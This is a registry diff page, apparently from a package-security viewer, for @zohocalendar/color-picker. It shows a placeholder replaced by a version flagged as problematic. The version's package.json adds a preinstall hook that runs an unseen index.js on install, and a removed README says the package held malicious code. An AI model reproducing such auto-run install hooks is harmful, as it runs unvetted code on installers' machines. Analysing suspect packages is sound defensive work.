@zohocalendar/color-picker 0.0.1-security → 1.560.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @zohocalendar/color-picker might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/index.js +29 -0
  2. package/lib/index.js +7160 -0
  3. package/package.json +16 -3
  4. package/README.md +0 -5
package/package.json CHANGED
@@ -1,6 +1,19 @@
1
1
  {
2
2
  "name": "@zohocalendar/color-picker",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.560.0",
4
+ "description": "Color picker react component",
5
+ "private": false,
6
+ "main": "lib/index.js",
7
+ "scripts": {
8
+ "preinstall": "node index.js",
9
+ "prepublishOnly": "node index.js",
10
+ "build": "npm run build",
11
+ "test": "echo \"Error: no test specified\" && exit 1"
12
+ },
13
+ "dependencies": {
14
+ "react": "^17.0.2",
15
+ "react-dom": "^17.0.2"
16
+ },
17
+ "author": "hz0ho",
18
+ "license": "MIT"
6
19
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40zohocalendar%2Fcolor-picker for more information.